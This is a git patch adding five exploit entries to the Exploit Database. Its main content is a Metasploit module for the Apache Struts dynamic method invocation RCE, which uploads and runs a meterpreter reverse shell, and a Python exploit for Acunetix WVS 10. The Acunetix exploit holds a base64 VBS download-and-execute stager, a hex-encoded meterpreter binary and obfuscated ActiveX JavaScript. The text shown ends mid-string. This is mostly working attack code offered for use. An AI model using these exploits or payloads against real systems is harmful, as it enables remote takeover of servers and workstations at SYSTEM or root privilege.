From 28f57d0dbae5631bf90c613dd2681c3cfd2c0641 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 3 May 2016 05:04:01 +0000 Subject: [PATCH] DB: 2016-05-03 5 new exploits WordPress Ghost Plugin 0.5.5 - Unrestricted Export Download .Net Framework Execute Native x86 Shellcode Acunetix WVS 10 - Remote Command Execution (System) Apache Struts Dynamic Method Invocation Remote Code Execution QSEE - PRDiag* Commands Privilege Escalation Exploit --- files.csv | 5 + platforms/android/local/39757.txt | 10 + platforms/linux/remote/39756.rb | 190 ++++++++++++ platforms/php/webapps/39752.txt | 23 ++ platforms/win32/shellcode/39754.txt | 10 + platforms/windows/remote/39755.py | 448 ++++++++++++++++++++++++++++ 6 files changed, 686 insertions(+) create mode 100755 platforms/android/local/39757.txt create mode 100755 platforms/linux/remote/39756.rb create mode 100755 platforms/php/webapps/39752.txt create mode 100755 platforms/win32/shellcode/39754.txt create mode 100755 platforms/windows/remote/39755.py diff --git a/files.csv b/files.csv index b85dffdaa..c27270d9f 100755 --- a/files.csv +++ b/files.csv @@ -35964,3 +35964,8 @@ id,file,description,date,author,platform,type,port 39749,platforms/multiple/dos/39749.txt,"Wireshark - alloc_address_wmem Assertion Failure",2016-04-29,"Google Security Research",multiple,dos,0 39750,platforms/multiple/dos/39750.txt,"Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read",2016-04-29,"Google Security Research",multiple,dos,0 39751,platforms/php/webapps/39751.txt,"GLPi 0.90.2 - SQL Injection",2016-04-29,"High-Tech Bridge SA",php,webapps,80 +39752,platforms/php/webapps/39752.txt,"WordPress Ghost Plugin 0.5.5 - Unrestricted Export Download",2016-05-02,"Josh Brody",php,webapps,80 +39754,platforms/win32/shellcode/39754.txt,".Net Framework Execute Native x86 Shellcode",2016-05-02,Jacky5112,win32,shellcode,0 +39755,platforms/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution (System)",2016-05-02,"Daniele Linguaglossa",windows,remote,0 +39756,platforms/linux/remote/39756.rb,"Apache Struts Dynamic Method Invocation Remote Code Execution",2016-05-02,metasploit,linux,remote,8080 +39757,platforms/android/local/39757.txt,"QSEE - PRDiag* Commands Privilege Escalation Exploit",2016-05-02,laginimaineb,android,local,0 diff --git a/platforms/android/local/39757.txt b/platforms/android/local/39757.txt new file mode 100755 index 000000000..b7866fab8 --- /dev/null +++ b/platforms/android/local/39757.txt @@ -0,0 +1,10 @@ +Sources: +https://bits-please.blogspot.ca/2016/05/qsee-privilege-escalation-vulnerability.html +https://github.com/laginimaineb/cve-2015-6639 + +Qualcomm's Secure Execution Environment (QSEE) Privilege Escalation Exploit using PRDiag* commands (CVE-2015-6639) + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39757.zip + diff --git a/platforms/linux/remote/39756.rb b/platforms/linux/remote/39756.rb new file mode 100755 index 000000000..134d113f1 --- /dev/null +++ b/platforms/linux/remote/39756.rb @@ -0,0 +1,190 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Struts Dynamic Method Invocation Remote Code Execution', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in Apache Struts + version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code + Execution can be performed via method: prefix when Dynamic Method Invocation + is enabled. + }, + 'Author' => [ 'Nixawk' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-3081' ], + [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ] + ], + 'Platform' => %w{ linux }, + 'Privileged' => true, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp_uuid' + }, + 'Targets' => + [ + ['Linux Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ] + ], + 'DisclosureDate' => 'Apr 27 2016', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), + OptString.new('TMPPATH', [ false, 'Overwrite the temp path for the file upload. Needed if the home directory is not writable.', nil]) + ], self.class) + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def send_http_request(payload) + uri = normalize_uri(datastore['TARGETURI']) + res = send_request_cgi( + 'uri' => "#{uri}#{payload}", + 'method' => 'POST') + if res && res.code == 404 + fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI') + end + res + end + + def parameterize(params) # params is a hash + URI.escape(params.collect { |k, v| "#{k}=#{v}" }.join('&')) + end + + def generate_rce_payload(code, params_hash) + payload = "?method:" + payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS") + payload << "," + payload << Rex::Text.uri_encode(code) + payload << "," + payload << Rex::Text.uri_encode("1?#xx:#request.toString") + payload << "&" + payload << parameterize(params_hash) + payload + end + + def temp_path + @TMPPATH ||= lambda { + path = datastore['TMPPATH'] + return nil unless path + unless path.end_with?('/') + path << '/' + end + return path + }.call + end + + def upload_file(filename, content) + var_a = rand_text_alpha_lower(4) + var_b = rand_text_alpha_lower(4) + var_c = rand_text_alpha_lower(4) + var_d = rand_text_alpha_lower(4) + + code = "##{var_a}=new sun.misc.BASE64Decoder()," + code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_c}[0])))," + code << "##{var_b}.write(##{var_a}.decodeBuffer(#parameters.#{var_d}[0]))," + code << "##{var_b}.close()" + + params_hash = { var_c => filename, var_d => content } + payload = generate_rce_payload(code, params_hash) + + send_http_request(payload) + end + + def execute_command(cmd) + var_a = rand_text_alpha_lower(4) + var_b = rand_text_alpha_lower(4) + var_c = rand_text_alpha_lower(4) + var_d = rand_text_alpha_lower(4) + var_e = rand_text_alpha_lower(4) + var_f = rand_text_alpha_lower(4) + + code = "##{var_a}=@java.lang.Runtime@getRuntime().exec(#parameters.#{var_f}[0]).getInputStream()," + code << "##{var_b}=new java.io.InputStreamReader(##{var_a})," + code << "##{var_c}=new java.io.BufferedReader(##{var_b})," + code << "##{var_d}=new char[1024]," + code << "##{var_c}.read(##{var_d})," + + code << "##{var_e}=@org.apache.struts2.ServletActionContext@getResponse().getWriter()," + code << "##{var_e}.println(##{var_d})," + code << "##{var_e}.close()" + + cmd.tr!(' ', '+') if cmd && cmd.include?(' ') + params_hash = { var_f => cmd } + payload = generate_rce_payload(code, params_hash) + + send_http_request(payload) + end + + def linux_stager + payload_exe = rand_text_alphanumeric(4 + rand(4)) + path = temp_path || '/tmp/' + payload_exe = "#{path}#{payload_exe}" + + b64_filename = Rex::Text.encode_base64(payload_exe) + b64_content = Rex::Text.encode_base64(generate_payload_exe) + + print_status("Uploading exploit to #{payload_exe}") + upload_file(b64_filename, b64_content) + + print_status("Attempting to execute the payload...") + execute_command("chmod 700 #{payload_exe}") + execute_command("/bin/sh -c #{payload_exe}") + end + + def exploit + linux_stager + end + + def check + var_a = rand_text_alpha_lower(4) + var_b = rand_text_alpha_lower(4) + + addend_one = rand_text_numeric(rand(3) + 1).to_i + addend_two = rand_text_numeric(rand(3) + 1).to_i + sum = addend_one + addend_two + flag = Rex::Text.rand_text_alpha(5) + + code = "##{var_a}=@org.apache.struts2.ServletActionContext@getResponse().getWriter()," + code << "##{var_a}.print(#parameters.#{var_b}[0])," + code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two}))," + code << "##{var_a}.print(#parameters.#{var_b}[0])," + code << "##{var_a}.close()" + + params_hash = { var_b => flag } + payload = generate_rce_payload(code, params_hash) + + begin + resp = send_http_request(payload) + rescue Msf::Exploit::Failed + return Exploit::CheckCode::Unknown + end + + if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}") + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + +end \ No newline at end of file diff --git a/platforms/php/webapps/39752.txt b/platforms/php/webapps/39752.txt new file mode 100755 index 000000000..7089c9d69 --- /dev/null +++ b/platforms/php/webapps/39752.txt @@ -0,0 +1,23 @@ +# Exploit Title: WordPress Export to Ghost Unrestricted Export Download +# Date: 28-04-2016 +# Software Link: https://wordpress.org/plugins/ghost +# Exploit Author: Josh Brody +# Contact: http://twitter.com/joshmn +# Website: http://josh.mn/ +# Category: webapps + +1. Description + +Any visitor can download the Ghost Export file because of a failure to check if an admin user is properly authenticated. Assume all versions < 0.5.6 are vulnerable. + +2. Proof of Concept + +http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file + +File will be downloaded. + +3. Solution: + +Update to version 0.5.6 + +https://downloads.wordpress.org/plugin/ghost.0.5.6.zip \ No newline at end of file diff --git a/platforms/win32/shellcode/39754.txt b/platforms/win32/shellcode/39754.txt new file mode 100755 index 000000000..062de696a --- /dev/null +++ b/platforms/win32/shellcode/39754.txt @@ -0,0 +1,10 @@ +# Exploit Title: .Net framework execute native x86 shellcode +# Date: May. 2nd 2016 +# Exploit Author: Jacky5112  +# Software Link: https://github.com/jacky5112/ShellCodeTest_Version_1.0 +# Version: 1.0 +# Tested on: Windows +# CVE : (none) + +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39754.zip + diff --git a/platforms/windows/remote/39755.py b/platforms/windows/remote/39755.py new file mode 100755 index 000000000..4fc08a495 --- /dev/null +++ b/platforms/windows/remote/39755.py @@ -0,0 +1,448 @@ +''' +Acunetix WVS 10 - Remote command execution (SYSTEM privilege) + +- Author: Daniele Linguaglossa + +Overview +========= +Acunetix WVS 10 [1] is an enterprise web vulnerability scanner developer by Acunetix Inc. + +Two major flaws exists in the last version of Acunetix, these bug allow a remote attacker, +to execute command in the context of application with SYSTEM privilege. + + +Details +========== +A first flaw exists in the way Acunetix render some html elements inside gui, in fact it +uses jscript.dll without any concert about unsafe ActiveX object such as WScript.shell. +If acunetix trigger a vulnerability during a scan session it saves a local html with the +content of html page, so is possibile to trigger a fake vulnerability and insert a js +which trigger the remote command execution. + +The second flaw it's about the Acunetix scheduler [2], the scheduler just allow to scan +websites programmatically without any user interaction, is possible to schedule scan +via the web interface on 127.0.0.1:8183 . +like any scan Acunetix, will perform some tests on the targeted Host before real scan, +these test are executed upon some script into folder + +C:\ProgramData\Acunetix WVS 10\Data\Scripts + +icacls show a bad privileges in this folder, so any user (even guest) will be able to +replace these custom checks with own ones (Remember first flaw with jscript.dll) :D + +C:\ProgramData\Acunetix WVS 10\Data>icacls Scripts +Scripts Everyone:(OI)(CI)(M) + Everyone:(I)(OI)(CI)(M) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) + BUILTIN\Administrators:(I)(OI)(CI)(F) + CREATOR OWNER:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(OI)(CI)(RX) + BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA) <---- UNSAFE [3] + +Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file + +C:\ProgramData\Acunetix WVS 10\Data> + +With this two flaws in mind i wrote a small exploit which is able to obtain RCE via +a meterpreter shell, anyway there are some requirement: + +1) Target must have VBS script interpreter +2) Target must have the scheduler service +3) Target must be Windows + +Exploit +========== + +https://github.com/dzonerzy/acunetix_0day + +https://www.youtube.com/watch?v=gWcRlam59Fs (video proof) + +Solution +========== + +Jscript should be used with limited ActiveX, and permission on C:\ProgramData\Acunetix WVS 10\Data +must be fixed! + +Footnotes +_________ + +[1] http://www.acunetix.com/ +[2] http://www.acunetix.com/support/docs/wvs/scheduling-scans/ +[3] https://support.microsoft.com/it-it/kb/919240 +''' + +#!/usr/bin/env python +# -*- coding: utf-8 -*- +""" +Acunetix 0day SYSTEM Remote Command Execution by Daniele Linguaglossa + +This PoC exploit 2 vulnerability in Acunetix core , the first one is a RCE (Remote Command Exec) and the second one is +a LPE (Local Privilege Escalation). + +All credits for this exploit goes to Daniele Linguaglossa +""" + +from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer +from random import randint +from threading import Thread +from time import sleep +import binascii +import sys +import base64 +import os + + +server = None + + +def gen_random_name(size): + alphabet = "abcdefghilmnopqrstuvzABCDEFGHILMNOPQRSTUVZ0123456789" + name = "" + for i in range(0, size): + name += alphabet[randint(0, len(alphabet) - 1)] + return name + ".vbs" + + +def ip2b(ip): + return "".join(binascii.hexlify(chr(int(t))) for t in ip.split(".")) + + +def postexploitation(): + print "[*] Sleeping 1 minutes to elevate privileges...ZzZz" + sleep(70) # 2 minutes + global server + print "[!] Stopping server !" + server.shutdown() + print "[!] Exploit successful wait for session!" + +# param URL,FILENAME +PAYLOAD_DOWNLOAD_EXEC = "dHNraWxsIHd2cw0KJGE9JycnDQogU2V0IGZzbyA9IENyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmpl" \ + "Y3QiKQ0KIFNldCB3c2hTaGVsbCA9IENyZWF0ZU9iamVjdCggIldTY3JpcHQuU2hlbGwiICkNCiBTZXQgT3V0cCA9IFdz" \ + "Y3JpcHQuU3Rkb3V0DQogU2V0IEZpbGUgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiTWljcm9zb2Z0LlhNTEhUVFAiKQ0K" \ + "IEZpbGUuT3BlbiAiR0VUIiwgImh0dHA6Ly8lcy9zdGFnZTIiLCBGYWxzZQ0KIE15RmlsZSA9IHdzaFNoZWxsLkV4cGFu" \ + "ZEVudmlyb25tZW50U3RyaW5ncyggIiVzIiApKyJcJXMiDQogRmlsZS5TZW5kDQogU2V0IEJTID0gQ3JlYXRlT2JqZWN0" \ + "KCJBRE9EQi5TdHJlYW0iKQ0KIEJTLnR5cGUgPSAxDQogQlMub3Blbg0KIEJTLldyaXRlIEZpbGUuUmVzcG9uc2VCb2R5" \ + "DQogQlMuU2F2ZVRvRmlsZSBNeUZpbGUsIDINCiB3c2hTaGVsbC5ydW4gIndzY3JpcHQgIitNeUZpbGUNCiBmc28uRGVs" \ + "ZXRlRmlsZShXc2NyaXB0LlNjcmlwdEZ1bGxOYW1lKQ0KICcnJw0KICRwdGggPSAoZ2V0LWl0ZW0gZW52OlRFTVApLlZh" \ + "bHVlKyJcc3RhZ2VyLnZicyI7DQogZWNobyAkYSA+ICRwdGgNCiB3c2NyaXB0ICRwdGg=" + +# param connect back IP +PAYLOAD_METERPETRER = "4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000000000" \ + "0000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6" \ + "e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010300e4fb66ef000" \ + "0000000000000e0000f030b01023800020000000e000000000000001000000010000000200000000040000010000000" \ + "020000040000000100000004000000000000000040000000020000463a0000020000000000200000100000000010000" \ + "0100000000000001000000000000000000000000030000064000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e7" \ + "465787400000028000000001000000002000000020000000000000000000000000000200030602e64617461000000" \ + "900a000000200000000c000000040000000000000000000000000000200030e02e6964617461000064000000003000" \ + "000002000000100000000000000000000000000000400030c000000000000000000000000000000000b800204000ff" \ + "e090ff253830400090900000000000000000ffffffff00000000ffffffff0000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000009090909090909090909090" \ + "90909090909090909090909090909090909033c0680810400064ff30648920fce8820000006089e531c0648b50308b" \ + "520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b59" \ + "2001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581" \ + "c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89" \ + "001000029c454506829806b00ffd56a0568%s680200115c89e6505050504050405068ea0fdfe0ffd5976a105657689" \ + "9a57461ffd585c0740aff4e0875ece8610000006a006a0456576802d9c85fffd583f8007e368b366a4068001000005" \ + "66a006858a453e5ffd593536a005653576802d9c85fffd583f8007d225868004000006a0050680b2f0f30ffd557687" \ + "56e4d61ffd55e5eff0c24e971ffffff01c329c675c7c3bbf0b5a2566a0053ffd5190f4da8a063058eceb8f7b69074c" \ + "4e814a3cae54e8172c60ead9604f2e86b0522895f543ebf148fad021d6146ace15f4ae3dbf55185e896fcaede21b0f" \ + "db55831cbcfb72949f584986c13ebc8dd35971d7cee480354c83bf909ab61c53b4412733e4cd8dc788890915d41c0b" \ + "2e06b529fe28c90a777a1a2ff95dc2a6bd697544d0462c01750e7f053c3ee2e1277d13515df7d3dc5ee57419630faf" \ + "f6c066e12a8ef76cb84891bb64b347b905ceaea1850bc52542cb5a967d538e70d8e7c5335132befb4f87450a5ecdf2" \ + "7ec89b1ed56e6beb044a950a8022ab5d46d5ba6f37655d35296ade2911292b5179f53d148dffee01672f90f1d82c22" \ + "b5e253c2637ed99e71e796953a070483bb13cab540c00873b6f5788a1a6e58663cf9cf2ff46b92cbcdad9215a101fb" \ + "54c71d2112151a19faec99fe5256fced9417f9673ddbb87439860eccedf31e528837cda1251b974f2808bdfc70cafa" \ + "e32fb6335cdda22e19e64fde514b779dc932bb8249f8d8f260fd457b719980bb069a1ed560e2c74d85182c3aacd499" \ + "df5dab0e0a0cee9e1da02cff7b89aac3f99de68badc83c9acf3c7518cf1578a58c131e1f3f36d393a7da0979f48115" \ + "9d687cd9e3d5bc9fe3d34b9c7aa362be497402f21045d1aa7b871e773facc169649d8f64c0ac91d2feb85063169af8" \ + "87973643f41f9b5c38b01cb2eb327e17d1d0f7f5e8693022c729f69b83723df61b9617f533cf919740edbb92ca86f9" \ + "f1db8cdf696531559d41193f2356414df49a8e22790a7cb174079b5273c485e252296d690796649048410e29fc8a4d" \ + "3d3384a98beb5bca12574510183cbaa49f1eee2e7712df55312a40c18e636efe4e7066034e50060e3dcfc5354dc9d9" \ + "4b570a97d0b47eadc715effc165f9660797fc3ed75d5940262419d75ea5670a029774fa83b5818a7d46a9764de62be" \ + "e019444d30589d5d778499aaa0b3d10e7897d26fc5e446eb358c7067df52636d8a2ba7340f40e0c263522bb494500d" \ + "c73585ee9208e29ac7cdf591316712f1624116dc48ebe2c9fa5743e1e4519f82b8be65db56c09e6ef563286050decd" \ + "f9b327481b045b2073ea4e52ba5c6bb066c2f02709effd1db019cba7b8b682f16749d12ca8c89230edbbecfd59bf51" \ + "11ea1e6c9ed24ec62bcc37bff84195329a97a41354be5f297dd0edc868edbd35c528f79b9debf6a132b0ee1c140151" \ + "a90f0c6145149b01e6f55b7e6cc24f015a0f98627fee12834bcf368458827c4c824b1968aa4df58188c5909a95df1f" \ + "288c88326ee731d240159bba27397cc8b0fe4995ac6445a9033279af56f156d22416b8915f5b64a1acca60e4c1c6b8" \ + "f33af7431ed674bd62b6b26613cad5f9c9d395c95ee9acc56aacd0f4ea4e198fb6e061d012c91ffa99ecdc1510099f" \ + "8a4d4fc45273e6687be92c729b719692bb5e197083c4f4b77a1df988cd81141686743fe0e1ace050dec96c0fd8d75e" \ + "7182ea3cfc0f13c5cf804a8264c67166495837b6da837bb7e382527f63db2f94c75af6c855162aeb3b8a2c362819b9" \ + "b1d586db76faa0c06346149d2c88379cf186e36056669d4e7cc433cb8205dd0d058c2f6ae74111eeaa6a5883b14e74" \ + "482d130a665e53b6e89020d600be481779ee7b97631b897608d6933c65fcfc4f630dabe2d0dbad0af7c614d81b679d" \ + "619ce6a7eefbf94664a40e4772f540dc1964a979f4c25e125844c2a7075f6a6f5fae46dada35d3e83f82d03f87b11e" \ + "cfb4bf6636d727cf99dae040b8dd3c7abcdb98eabb7e71b56348ce6a3c635299efebc81690288bbab0f6cad2ebfd2a" \ + "a3d7aa74724b97be8ff3f360017970203ed71039a06799828f0455620fe432ef1dbb79cb87478c6d67e177fa72cbc0" \ + "c1422a65197e33ee6a4b314992beb18cbaa3bcd00f43cc2749ed61c8d8cb38f512bee5bdb4d4574c0c56b91da064bd" \ + "5c358dab92d2431b3c90938b4d0ec9661c2e9c98942585466ff7f0a7a5b5b56d825673b46966750cedce33eb0de118" \ + "c5c4211b1bfc6d297d5d48205ac40a8f47b78988807fa9d312465c1c080b158c01267965e443de442716d3fe8ac029" \ + "7640ef6d5632eaa784cf2b2b7a884d0589c93d69f8f8d7c6dc2b75a0825c0c5e892268cf3af3843004dc68dd05d367" \ + "6ac0b218d9adc3ecca734fe7fa61de3272584ed349fffa669175cd8a873b72b7dce3cb4a8e8afa8ddbba2039219220" \ + "6e9dc808a2ac3f2b6909e71321437b8979f26b9a8bda1fde661229544cb34ebc3ce7a4e0c05d340ba65457c67c3d61" \ + "5d249af5d333ab3894045480fa8bb3b6c75a41ed9dd00ec8367c68cd41b2b03caa30fc527a00d94b3c25620813ac9d" \ + "522e6e86cfee45a4f711171ec17f167abc0c4abb6c80de587bb790a1f83b9428d8380832a8216a6b8ea47cac624a24" \ + "ca171c95ebb6d81bd7676eff464d56436d32b66bb3d190e44e66beb412bd7d5d8978d7e0e93bb0e9f08944a6c45b4a" \ + "b5e493e0dd1491352d8078b0a3bae30bc2c145bc4e5f9dfd9b457d5dd8ff9c635031b02e7f3b8927b09460b983883a" \ + "dbb42bdff6f8c017b5096ce7d5a72ab620504be21555aa86871ee9e4887657b8e72d8813b429428596839d00c3e44f" \ + "fe5297ce95fc340278d1d805370c54f64615db34797f523f0a4cd2523d10d1a1b62146051db23668bc482d802b66bf" \ + "962f511ec6af7204cbb8d474204bf5c9e52ce0cfbd6298cf96f619a5d64827ba3284b25135965a9062f3cd7eb93745" \ + "390e9cc983c9a54ec731699bbda53958382cbb2e2ecd3247b18e5c3d64755c0d1e112e8375b5795afdfee8b69879c8" \ + "6597f79b6df2624dbe59557e8d13918c2d28c91c3a4f49a8682b62648259d118ffa02b2218efa031b45fd54c0b8d14" \ + "23d494b0a5da8e97ec345e17f9db32e9bec5cbcc36357b4ba8e7b8ccddc192d360d99a1e805dedc0ecadca15a0334f" \ + "680b0a9e91e12698ba69d27d86b2394c3d91682194ba312e8aef801a9ebc8722af9e8bd1180c0eed3137bfe109b06c" \ + "a442777eae4e1a145302152777da0a0a1decef0e0c73f2709cdb61360961eb1fc47cec9a893b9a8b2ec9f5a7fcce3e" \ + "178b459a54d9c5e40c6aada77896a7ee9054324019fe61e954c60dfd7bc895011c951e09fc195e779b71fc33833cdb" \ + "a5fe76ceb9a7b6ba5a39ed2e80c5d91b15cef0e1f5cb956b90e6db947fa45a4ae0e668b72a056dd29ea81c8b3aa126" \ + "b35d40c6dfa042cbd19c42b7ef44e6ef7b35952dbc796097530a04a71a3c116e99bf4a4ae8199685cc7e1e9f03a1ce" \ + "a8eb6d579e1e2ae0800000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "00000002c3000000000000000000000543000003830000000000000000000000000000000000000000000000000000" \ + "040300000000000000000000040300000000000009c004578697450726f63657373000000003000004b45524e454c3" \ + "3322e646c6c00000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "17aa9f565fccd8ce423701840cda9828320ce06749de816ae27196bce0849d1b494f89ffd49" + +# param CMD => PAYLOAD_DOWNLOAD_EXEC +EXPLOIT_STAGE_1 = "PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQ+d2luZG93LmFsZXJ0ID0genl4O3dpbmRvdy5wcm9tcHQgPSB6eXg7d" \ + "2luZG93LmNvbmZpcm0gPSB6eXg7d2luZG93LmNhbGxlZCA9IDA7ZnVuY3Rpb24genl4KCl7d2luZG93LmNhbGxlZCA9IDE7dm" \ + "FyIHh5ej0iJXMiO2V2YWwoZnVuY3Rpb24ocCxhLGMsayxlLGQpe2U9ZnVuY3Rpb24oYyl7cmV0dXJuIGMudG9TdHJpbmcoMzY" \ + "pfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKXtkW2MudG9TdHJpbmcoYSldPWtbY118fGMudG9TdHJp" \ + "bmcoYSl9az1bZnVuY3Rpb24oZSl7cmV0dXJuIGRbZV19XTtlPWZ1bmN0aW9uKCl7cmV0dXJuJ1xcdysnfTtjPTF9O3doaWxlK" \ + "GMtLSl7aWYoa1tjXSl7cD1wLnJlcGxhY2UobmV3IFJlZ0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSl9fXJldHVybi" \ + "BwfSgnNSAwPTYgNCgiMy4xIik7MC4yKFwnNyAvOCBkIC9lICIiICJjIiAtYiA5IC1hICJmIlwnKTsnLDE2LDE2LCdceDczXHg" \ + "2OFx4NjVceDZjXHg2Y3xceDUzXHg2OFx4NjVceDZjXHg2Y3xceDcyXHg3NVx4NmV8XHg1N1x4NTNceDYzXHg3Mlx4NjlceDcw" \ + "XHg3NHxceDQxXHg2M1x4NzRceDY5XHg3Nlx4NjVceDU4XHg0Zlx4NjJceDZhXHg2NVx4NjNceDc0fHZhcnxuZXd8XHg2M1x4N" \ + "mRceDY0fEN8Tm9ybWFsfFx4NjVceDZlXHg2M1x4NmZceDY0XHg2NVx4NjRceDYzXHg2Zlx4NmRceDZkXHg2MVx4NmVceDY0fH" \ + "dpbmRvd1x4NzNceDc0XHg3OVx4NmNceDY1fFx4NzBceDZmXHg3N1x4NjVceDcyXHg3M1x4NjhceDY1XHg2Y1x4NmN8XHg3M1x" \ + "4NzRceDQxXHg1Mlx4NzR8QnwkJCcucmVwbGFjZSgiJCQiLHh5eikuc3BsaXQoJ3wnKSwwLHt9KSk7ZG9jdW1lbnQuYm9keS5p" \ + "bm5lckhUTUw9JzQwNCBOb3QgZm91bmQnO308L3NjcmlwdD4lczxzY3JpcHQ+aWYgKHdpbmRvdy5jYWxsZWQgPT0gMCl7enl4K" \ + "Ck7fTwvc2NyaXB0PjwvYm9keT48L2h0bWw+" + + +LOGIN_FORM = "PHN0eWxlPg0KYm9keXsNCiAgbWFyZ2luOiAwcHg7DQogIHBhZGRpbmc6IDBweDsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCn0NCg" \ + "0KaDF7DQogIGNvbG9yOiAjZmZmOw0KICB0ZXh0LWFsaWduOiBjZW50ZXI7DQogIGZvbnQtZmFtaWx5OiBBcmlhbDsNCiAgZm9udC13Z" \ + "WlnaHQ6IG5vcm1hbDsNCiAgbWFyZ2luOiAyZW0gYXV0byAwcHg7DQp9DQoub3V0ZXItc2NyZWVuew0KICBiYWNrZ3JvdW5kOiAjMTMy" \ + "MDJjOw0KICB3aWR0aDogOTAwcHg7DQogIGhlaWdodDogNTQwcHg7DQogIG1hcmdpbjogNTBweCBhdXRvOw0KICBib3JkZXItcmFkaXV" \ + "zOiAyMHB4Ow0KICAtbW96LWJvcmRlci1yYWRpdXM6IDIwcHg7DQogIC13ZWJraXQtYm9yZGVyLXJhZGl1czogMjBweDsNCiAgcG9zaXR" \ + "pb246IHJlbGF0aXZlOw0KICBwYWRkaW5nLXRvcDogMzVweDsNCn0NCg0KLm91dGVyLXNjcmVlbjpiZWZvcmV7DQogIGNvbnRlbnQ6IC" \ + "IiOw0KICBiYWNrZ3JvdW5kOiAjM2U0YTUzOw0KICBib3JkZXItcmFkaXVzOiA1MHB4Ow0KICBwb3NpdGlvbjogYWJzb2x1dGU7DQogI" \ + "GJvdHRvbTogMjBweDsNCiAgbGVmdDogMHB4Ow0KICByaWdodDogMHB4Ow0KICBtYXJnaW46IGF1dG87DQogIHotaW5kZXg6IDk5OTk" \ + "7DQogIHdpZHRoOiA1MHB4Ow0KICBoZWlnaHQ6IDUwcHg7DQp9DQoub3V0ZXItc2NyZWVuOmFmdGVyew0KICBjb250ZW50OiAiIjsNCi" \ + 